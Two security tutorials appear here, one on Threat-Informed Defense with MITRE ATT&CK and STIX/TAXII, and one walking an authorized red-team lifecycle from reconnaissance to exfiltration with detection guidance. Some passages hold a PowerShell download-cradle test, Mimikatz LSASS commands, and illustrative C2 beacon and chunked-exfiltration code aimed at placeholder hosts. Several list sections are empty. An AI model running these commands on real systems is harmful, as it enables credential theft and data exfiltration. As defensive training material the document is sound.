Objective: Understand how defenders operationalize adversary knowledge — the Pyramid of Pain, MITRE ATT&CK, the CTI lifecycle, STIX/TAXII, M3TID/INFORM, and adversary emulation — into a continuous, measurable intelligence-driven security cycle rather than reacting to brittle indicators.

1. The Problem With Reactive Defense

Indicator-centric programs fail because indicators are cheap for the adversary to change. Hashes, IP addresses, and domains rotate trivially — a recompile changes a hash; a new VPS changes an IP. As popularized by David Bianco’s Pyramid of Pain (2013), these atomic indicators detect an adversary only for a fleeting window.

The Pyramid ranks indicator types by how much pain it causes an adversary to change them:

Documenting activity at the TTP level lets defenders think at an abstraction that is concrete enough to be actionable, yet stable enough to remain valid across adversaries and over time. Unlike traditional models that focus on indicators of compromise (IOCs), behavioral defense maps how adversaries operate once inside the environment. That is the foundation of Threat-Informed Defense.

2. What Is Threat-Informed Defense?

Threat-Informed Defense (TID) is the systematic application of a deep understanding of adversary tradecraft and technology to improve defenses. The MITRE Center for Threat-Informed Defense (CTID) defines it across three operationalized dimensions:

The shift is from “Are we patched?” to “Are we defended against these adversaries?” TID is a mindset that prioritizes finite defensive budget against the behaviors that actually threaten your sector.

3. MITRE ATT&CK: Architecture and Anatomy

The MITRE ATT&CK® Framework is a globally accessible knowledge base of adversary TTPs based on real-world observations. Its core objects:

The 14 Enterprise tactics, in order: Reconnaissance (TA0043), Resource Development (TA0042), Initial Access (TA0001), Execution (TA0002), Persistence (TA0003), Privilege Escalation (TA0004), Defense Evasion (TA0005), Credential Access (TA0006), Discovery (TA0007), Lateral Movement (TA0008), Collection (TA0009), Command and Control (TA0011), Exfiltration (TA0010), Impact (TA0040). ATT&CK is versioned — always confirm IDs against attack.mitre.org.

ATT&CK is distributed as STIX 2.1. You can parse the public bundle directly to enumerate every technique:

from stix2 import MemoryStore, Filter

store = MemoryStore()
store.load_from_file("enterprise-attack.json")  # mitre/cti repo

for t in store.query([Filter("type", "=", "attack-pattern")]):
    for ref in t.get("external_references", []):
        if ref.get("source_name") == "mitre-attack":
            print(ref["external_id"], "-", t["name"])

ATT&CK Navigator visualizes and compares coverage layers (JSON format), while ATT&CK Workbench lets organizations manage and extend a local copy of the knowledge base in sync with the public one.

4. The CTI Lifecycle: From Raw Data to Prioritized TTPs

Intelligence is produced, not collected ad hoc. The six-phase CTI lifecycle maps cleanly onto the TID dimensions:

Structured intelligence is exchanged with STIX 2.1 (the data model) over TAXII 2.1 (the transport, supporting Collections and Channels). Open platforms — MISP and OpenCTI — ingest STIX bundles manually, via connectors, or by subscribing to a TAXII feed.

A minimal shareable STIX bundle links a threat actor to a technique through a relationship:

from stix2 import ThreatActor, AttackPattern, Relationship, Bundle, ExternalReference

actor = ThreatActor(name="APT29", labels=["nation-state"])

technique = AttackPattern(
    name="Spearphishing Attachment",
    external_references=[ExternalReference(
        source_name="mitre-attack",
        external_id="T1566.001",
        url="https://attack.mitre.org/techniques/T1566/001")])

rel = Relationship(actor, "uses", technique)
print(Bundle(actor, technique, rel).serialize(pretty=True))

Automating the loop turns a TAXII feed into a prioritized TTP list for the detection team:

from taxii2client.v21 import Server
from stix2 import parse
import csv

server = Server("https://taxii.example-isac.org/taxii2/",
                user="analyst", password="<token>")
collection = server.api_roots[0].collections[0]

ttps = []
for obj in collection.get_objects().get("objects", []):
    so = parse(obj, allow_custom=True)
    if so.get("type") == "attack-pattern":
        for ref in so.get("external_references", []):
            if ref.get("source_name") == "mitre-attack":
                ttps.append((ref["external_id"], so["name"]))

with open("prioritized_ttps.csv", "w", newline="") as f:
    csv.writer(f).writerows([("technique_id", "name"), *sorted(set(ttps))])

5. Building a Sector-Specific Threat Model

You cannot defend against everything, so prioritize. Select the ATT&CK Groups relevant to your sector, extract their techniques, and weight by frequency using CTID’s Sightings Ecosystem data and the Top ATT&CK Techniques Calculator.

The mitreattack-python library pulls a group’s full technique set:

from mitreattack.stix20 import MitreAttackData

data = MitreAttackData("enterprise-attack.json")
apt29 = data.get_groups_by_alias("APT29")[0]

for entry in data.get_techniques_used_by_group(apt29.id):
    tech = entry["object"]
    print(data.get_attack_id(tech.id), tech["name"])

Layer the result in the Navigator and colour cells by your current detection status. A layer file encodes that scoring directly:

{
  "name": "Detection Coverage - APT29",
  "versions": { "attack": "16", "navigator": "5.1.0", "layer": "4.5" },
  "domain": "enterprise-attack",
  "techniques": [
    { "techniqueID": "T1566.001", "color": "#fc3b3b", "comment": "None - no email detonation telemetry" },
    { "techniqueID": "T1059.001", "color": "#33cc33", "comment": "Detected - Script Block Logging" },
    { "techniqueID": "T1055",     "color": "#ffe766", "comment": "Partial - EDR on workstations only" }
  ]
}

6. Mapping Controls to ATT&CK: The Defensive Measures Dimension

Knowing the adversary is useless without knowing your own coverage. CTID’s Mappings Explorer lets defenders see how security capabilities map to ATT&CK, and the NIST SP 800-53 ↔ ATT&CK mappings let you assess control coverage against real-world techniques.

The critical pitfall: ATT&CK coverage ≠ detection coverage. A control that can mitigate a technique is not the same as telemetry that proves you detect it. Distinguish two gap types:

Re-run the Mappings Explorer comparison before and after each emulation cycle to quantify the coverage delta — that delta is your measurable program improvement.

7. Testing & Evaluation: Closing the Loop

T&E proves defenses work by emulating real adversary behavior. Distinguish the disciplines:

MITRE CALDERA is a scalable, automated adversary-emulation platform; Atomic Red Team (Red Canary) is a library of small, ATT&CK-mapped tests for fast technique validation; and the CTID Adversary Emulation Library provides full emulation plans modeled on real threats. Run them as purple-team exercises — red executes, blue observes, both tune in real time.

# T1059.001 - atomic test metadata (excerpt)
attack_technique: T1059.001
display_name: PowerShell
atomic_tests:
  - name: Download cradle execution
    executor:
      name: powershell
      command: |
        IEX (New-Object Net.WebClient).DownloadString('#{cradle_url}')
    input_arguments:
      cradle_url:
        type: url
        default: https://example.test/benign.ps1

# Execute one atomic test, then confirm the telemetry fired
Invoke-AtomicTest T1059.001 -TestNumbers 1
# Map result -> Navigator: green only if Sysmon EID 1 + Script Block Log observed

If the test fires but no analytic alerts, you have found a detection gap — feed it straight back into the cycle.

8. M3TID and INFORM: Measuring Program Maturity

CTID’s M3TID (Measure, Maximize, Mature Threat-Informed Defense) operationalizes the three dimensions and assigns relative weighting:

The weighting reflects that defensive measures are where threat knowledge becomes protection. INFORM (Jan 2026) builds on M3TID, translating CTI, defensive measures, and T&E into a measurable, repeatable strategic maturity practice. Treat M3TID as the foundational reference and INFORM as its strategic-maturity successor — they are distinct publications, not synonyms. Self-assess each dimension, then invest where the lowest-weighted-adjusted score sits.

9. The Intelligence-Driven Security Cycle: Putting It All Together

The dimensions form a continuous loop, not a one-time audit:

1. Direction/CTI: Ingest sector intelligence via TAXII; extract prioritized TTPs.
2. Threat model: Layer relevant ATT&CK Groups in Navigator.
3. Defensive measures: Map controls via Mappings Explorer; identify gaps.
4. T&E: Emulate the TTP chain with CALDERA / Atomic Red Team.
5. Measure: Score coverage delta and M3TID maturity.
6. Feedback: Failed detections become new CTI collection requirements.

Each rotation tightens coverage against the adversaries you actually face. The loop never closes — new sightings continuously reshape the threat model.

10. Common Pitfalls and Maturity Anti-Patterns

• The “ATT&CK checkbox” fallacy — colouring a cell green for a control that is mapped but never validated.
• Retroactive labeling — tagging alerts with technique IDs after the fact instead of engineering proactive detections.
• IOC over-reliance — building the program on indicators near the bottom of the Pyramid of Pain.
• Treating the matrix as static — ATT&CK is versioned; threat models decay if not refreshed.
• Stale TTPs — driving investment from sightings years old without re-validation.

11. Common Attacker Techniques

These are the behaviors a TID program is built to detect — the worked examples throughout the cycle:

12. Defensive Strategies & Detection

TID succeeds only if emulation is observable. Validate that the following telemetry fires during every T&E run:

Anchor every detection to an ATT&CK ID so coverage is measurable. A skeleton Sigma rule for encoded PowerShell:

title: Suspicious PowerShell Encoded Command Execution
status: experimental
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - '-enc'
      - '-EncodedCommand'
  condition: selection
tags:
  - attack.execution
  - attack.t1059.001
  - attack.ta0002
level: medium

Hardening baselines: enable command-line process auditing (ProcessCreationIncludeCmdLine_Enabled); enforce PowerShell Constrained Language Mode with Script Block and Module Logging; deploy Sysmon with a maintained config (e.g., SwiftOnSecurity) validated against each technique’s ATT&CK data sources; enforce a TTP expiry policy (re-validate sightings older than 24 months); and configure automated TAXII ingest from ISAC/CERT networks.

13. Tools for Threat-Informed Defense

14. MITRE ATT&CK Mapping

Summary

• Threat-Informed Defense replaces brittle IOC reaction with stable, behavior-centric defense built on adversary TTPs.
• The Pyramid of Pain motivates the shift; MITRE ATT&CK supplies the shared TTP vocabulary across Tactics, Techniques, Groups, and Mitigations.
• TID’s three dimensions — CTI, Defensive Measures, Testing & Evaluation — connect through the six-phase CTI lifecycle and exchange intelligence via STIX 2.1 over TAXII 2.1.
• M3TID measures maturity (CTI 30%, DM 50%, T&E 20%); INFORM is its strategic successor.
• Close the loop with CALDERA, Atomic Red Team, and the CTID Adversary Emulation Library, validating every technique against Sysmon and ATT&CK-tagged Sigma rules.

Related Tutorials

• Cyber Threat Intelligence (CTI) Fundamentals: Sources, Types, and the Intelligence Lifecycle
• APT Profiling: How to Build a Comprehensive Adversary Profile from Open-Source Intelligence
• Access Tokens and Privileges: The Kernel’s Security Context
• SIDs and Security Descriptors: Identity in Windows Security
• Mapping CTI Reports to ATT&CK TTPs: A Step-by-Step Methodology

References

• Adversary Emulation Plans | MITRE ATT&CK®
• Get Started: Adversary Emulation and Red Teaming | MITRE ATT&CK®
• Get Started: Threat Intelligence | MITRE ATT&CK®
• Our Mission: Threat-Informed Defense | MITRE Center for Threat-Informed Defense (CTID)
• Adversary Emulation Library | MITRE Center for Threat-Informed Defense (CTID)
• Enabling Threat-Informed Cybersecurity: Evolving CISA’s Approach to Cyber Threat Information Sharing | CISA

The Attack Lifecycle: Reconnaissance to Exfiltration

Objective: Understand how a real-world adversary operation unfolds across the full MITRE ATT&CK Enterprise lifecycle — from pre-engagement reconnaissance through to data exfiltration — and learn how each phase is executed by authorized red teams and detected and disrupted by defenders.

1. Red Teaming & the Attack Lifecycle — Why It Matters

MITRE ATT&CK categorizes the tactics, techniques, and procedures (TTPs) used by real-world threat actors into a standardized matrix of adversary behaviors spanning the entire attack lifecycle. It is organized into three layers:

• Tactics — the tactical goals an adversary pursues (the “why”).
• Techniques — the actions taken to achieve those goals (the “how”).
• Procedures — the concrete technical steps to perform a technique.

The Enterprise matrix contains 14 tactics, beginning with Reconnaissance (TA0043) and ending with Impact. Unlike Lockheed Martin’s linear Cyber Kill Chain, ATT&CK is a behavior catalog — a red team uses it to plan a realistic operation, and a blue team uses the same IDs to measure detection coverage. This tutorial walks a simulated Windows enterprise engagement phase by phase, pairing each offensive step with its detection telemetry.

2. Pre-Engagement: Rules of Engagement and Scoping

No technique in this tutorial is legal without written authorization. A red team operation begins with a signed Rules of Engagement (RoE) document that fixes:

Threat-model selection (e.g., emulating a specific intrusion set) drives which techniques are exercised. Everything that follows assumes explicit, documented authorization.

3. Reconnaissance & Resource Development (TA0043, TA0042)

Reconnaissance (TA0043) gathers information about the target environment for use in later phases. It splits into passive collection — which never touches target infrastructure — and active scanning.

Passive OSINT pulls from public data sources: WHOIS, Shodan, LinkedIn, and certificate transparency logs (T1590, T1589, T1593). Certificate transparency is especially valuable for surfacing subdomains and shadow infrastructure.

# Enumerate subdomains from certificate transparency logs (T1590)
curl -s "https://crt.sh/?q=%25.example.com&output=json" \
  | jq -r '.[].name_value' | sort -u

# Passive registration metadata (T1590)
whois example.com | grep -Ei 'Registrar|Name Server|Creation'

Active Scanning (T1595) — port and service discovery with tools like Nmap — is the most prominent Reconnaissance technique and the first activity that generates target-side telemetry.

Resource Development (TA0042) prepares the operational toolkit: acquiring infrastructure (T1583), establishing accounts (T1585), and obtaining or developing capabilities (T1588, T1587). For a red team this means standing up redirectors, C2 servers, and phishing domains before any contact with the target.

4. Initial Access (TA0001)

Initial Access (TA0001) is the most frequently employed tactic — it establishes the adversarial foothold. The dominant techniques are Phishing (T1566) and Valid Accounts (T1078), the latter gaining significant prominence in 2024.

In a typical spearphishing scenario, a pretext email lures a user (T1204, User Execution) into opening an attachment that spawns a child process — the handoff point into the Execution tactic.

5. Execution & Persistence (TA0002, TA0003)

Execution (TA0002) runs adversary-controlled code on the host. Command and Scripting Interpreter (T1059) — particularly PowerShell (T1059.001) and the Windows command shell (T1059.003) — is the workhorse, alongside WMI (T1047) and scheduled tasks (T1053).

Persistence (TA0003) ensures the foothold survives reboots and logoffs. Common techniques are Boot or Logon Autostart Execution (T1547) and Scheduled Task/Job (T1053.005). The following illustrates a benign scheduled-task persistence pattern and the events it generates.

# Illustrative persistence via scheduled task (T1053.005)
$action  = New-ScheduledTaskAction -Execute "powershell.exe" `
            -Argument "-NoProfile -File C:\ProgramData\update.ps1"
$trigger = New-ScheduledTaskTrigger -AtLogOn
Register-ScheduledTask -TaskName "SystemUpdateCheck" `
    -Action $action -Trigger $trigger -RunLevel Highest

This single command produces Windows Event ID 4698 (scheduled task created) and Sysmon Event ID 1 (process creation) with powershell.exe as the task action — a high-fidelity detection pair.

6. Privilege Escalation, Defense Evasion & Credential Access (TA0004, TA0005, TA0006)

Privilege Escalation (TA0004) seeks elevated rights via Process Injection (T1055), Valid Accounts (T1078), and Create or Modify System Process (T1543). Defense Evasion (TA0005) then hides the activity — Indicator Removal (T1070) clears event logs, and Impair Defenses (T1562) disables security tooling.

Credential Access (TA0006) harvests authentication material. OS Credential Dumping: LSASS Memory (T1003.001) reads cleartext credentials and hashes from the LSASS process. The Mimikatz syntax below is a reference for understanding what the technique reads, not a functional payload.

# Mimikatz syntax reference — LSASS memory read (T1003.001)
privilege::debug              # acquire SeDebugPrivilege
sekurlsa::logonpasswords      # parse credential material from LSASS memory

The cross-process read of lsass.exe is exactly what Sysmon Event ID 10 (ProcessAccess) is tuned to catch, typically on a GrantedAccess mask of 0x1410.

7. Discovery (TA0007)

Discovery (TA0007) maps the internal environment once inside. Built-in commands provide low-noise enumeration of accounts (T1087), permission groups (T1069), remote systems (T1018), and host configuration (T1082, T1016).

# Internal recon mapped to Discovery techniques
whoami /all                       # T1033 — user, groups, privileges
Get-ADUser -Filter *              # T1087 — domain accounts
Get-ADGroupMember "Domain Admins" # T1069 — privileged group membership
nltest /domain_trusts             # T1482 — trust relationships
Get-ADComputer -Filter *          # T1018 — remote systems

Graph-based AD enumeration with SharpHound (the BloodHound collector) accelerates this phase by mapping attack paths to high-value objects. Because SharpHound queries many hosts in rapid succession, it surfaces in Sysmon Event ID 3 (network connection) as a fan-out of LDAP and SMB connections from a single process.

8. Lateral Movement (TA0008)

Lateral Movement (TA0008) expands the foothold toward sensitive systems after internal reconnaissance. In Windows-heavy environments the primary techniques are:

Pass the Hash reuses a captured NTLM hash to authenticate without the plaintext password. Kerberoasting requests service tickets for accounts with SPNs, then cracks them offline. A Ticket Encryption Type of 0x17 (RC4-HMAC) instead of 0x12 (AES256) across many Windows Event ID 4769 records in a short window is a strong Kerberoasting indicator. SMB-based movement via PsExec also leaves Sysmon Event ID 17/18 named-pipe artifacts.

9. Collection & Command and Control (TA0009, TA0011)

Collection (TA0009) gathers target data prior to exfiltration: Data from Local System (T1005), Data from Network Shared Drive (T1039), Email Collection (T1114), and Automated Collection (T1119). Collected data is then archived (T1560) to shrink and obscure it.

# Staging collected data (T1560) before exfiltration
Compress-Archive -Path C:\Users\jdoe\Documents\*.docx `
    -DestinationPath C:\ProgramData\stage.zip
certutil -encode C:\ProgramData\stage.zip C:\ProgramData\stage.b64

Command and Control (TA0011) maintains the operator channel. Application Layer Protocol: Web Protocols (T1071.001) blends C2 into normal HTTPS, defeating deep packet inspection; Encrypted Channel (T1573) and Protocol Tunneling (T1572) add further cover. Mature implants beacon low-and-slow with jittered sleep to evade volumetric detection.

# Conceptual HTTPS beacon loop (T1071.001) — illustrative, not implant code
import time, random, requests

while True:
    task = requests.get("https://cdn.example-c2.test/poll", verify=True)
    # ... process task, return results out-of-band ...
    sleep = 60 + random.randint(-15, 15)   # jitter to flatten beacon timing
    time.sleep(sleep)

10. Exfiltration (TA0010)

In Exfiltration (TA0010) the adversary steals the staged data. Because data is already collected and archived, the focus is moving it out without tripping volume or destination alarms.

Exfiltration Over Web Service (T1567) is favored because hosts already communicate with popular SaaS providers, firewall rules likely permit that traffic, and provider SSL/TLS hides the payload. Chunking (T1030) keeps each transfer below detection thresholds.

# Conceptual chunked exfil over a web service (T1567 + T1030) — illustrative
CHUNK = 512 * 1024   # cap per request to stay under size thresholds
with open("stage.b64", "rb") as f:
    while (block := f.read(CHUNK)):
        requests.post("https://storage.example-saas.test/upload",
                      data=block, verify=True)

11. Common Attacker Techniques Across the Lifecycle

12. Defensive Strategies & Detection

Detection is most effective when Sysmon events are chained across phases rather than alerted in isolation.

Pair Sysmon with Windows Security auditing: Event 4624 (logon), 4688 (process + command line), 4698 (scheduled task), 4769 (Kerberos service ticket — watch for 0x17), and 5140/5156 (share access and allowed connections). Enable Audit Process Creation with command-line logging, PowerShell Script Block Logging, and Audit Kerberos Service Ticket Operations. ETW providers such as Microsoft-Windows-PowerShell, Microsoft-Windows-Kernel-Network, and Microsoft-Windows-SMBClient deepen visibility.

A representative Sigma rule chains suspicious PowerShell with an outbound connection:

title: PowerShell Process With Outbound Network Connection
logsource:
  product: windows
  service: sysmon
detection:
  proc:
    EventID: 1
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - '-enc'
      - 'DownloadString'
      - 'IEX'
  net:
    EventID: 3
    Image|endswith: '\powershell.exe'
  condition: proc and net
level: high

MITRE ATT&CK mapping for the primary abuse primitives:

Hardening per phase: minimize public attack surface and monitor certificate transparency; enforce MFA and patch internet-facing services (T1190); deploy Sysmon with Windows Event Forwarding to a SIEM; segment networks to restrict RDP/SMB; enable Credential Guard and AES256 Kerberos to eliminate RC4 Kerberoasting; and apply DLP with egress filtering against cloud-storage exfiltration.

13. Tools for Attack Lifecycle Analysis

For an engagement debrief, encode the simulated operation as an ATT&CK Navigator layer so the blue team can see exactly which techniques were exercised and where coverage was missing:

{
  "name": "Lifecycle Engagement - 2024",
  "domain": "enterprise-attack",
  "techniques": [
    { "techniqueID": "T1595", "score": 100, "color": "#e60d0d" },
    { "techniqueID": "T1566", "score": 100, "color": "#e60d0d" },
    { "techniqueID": "T1059", "score": 100, "color": "#e60d0d" },
    { "techniqueID": "T1003", "score": 100, "color": "#e60d0d" },
    { "techniqueID": "T1021", "score": 75,  "color": "#f4a442" },
    { "techniqueID": "T1071", "score": 75,  "color": "#f4a442" },
    { "techniqueID": "T1567", "score": 100, "color": "#e60d0d" }
  ]
}

Summary

• The attack lifecycle is a continuous chain of ATT&CK tactics — Reconnaissance to Exfiltration — that red teams emulate and blue teams measure with the same technique IDs.
• Early phases (TA0043, TA0042, TA0001) establish a foothold through scanning, phishing, and valid-account abuse, while mid-chain phases escalate, evade, and harvest credentials (T1055, T1003.001, T1558.003).
• Lateral movement (T1021, T1550.002) and C2 (T1071.001) expand and sustain access before staged data is archived (T1560) and exfiltrated over trusted channels (T1041, T1567).
• Detection works best by chaining Sysmon events (1, 3, 10, 11, 17/18, 22) with Windows audit IDs (4688, 4698, 4769) and Sigma rules across phases.
• Map every emulated technique into an ATT&CK Navigator layer to expose detection gaps and drive defensive hardening.

Related Tutorials

• Phishing Campaign Design: Pretexting, Lures, and Target Profiling
• Building a Red Team Lab: Infrastructure, VMs, and C2 Setup
• Cyber Threat Intelligence (CTI) Fundamentals: Sources, Types, and the Intelligence Lifecycle
• OSINT for People and Credentials: LinkedIn, Breach Data, and Email Harvesting
• Active OSINT: DNS, Certificate Transparency, and Subdomain Enumeration

References

• Reconnaissance, Tactic TA0043 – Enterprise | MITRE ATT&CK®
• Exfiltration, Tactic TA0010 – Enterprise | MITRE ATT&CK®
• Get Started: Adversary Emulation and Red Teaming | MITRE ATT&CK®
• Exfiltration Over Web Service, Technique T1567 – Enterprise | MITRE ATT&CK®
• What is the MITRE ATT&CK Framework? | Microsoft Security
• Red Teaming and MITRE ATT&CK | Red Team Development and Operations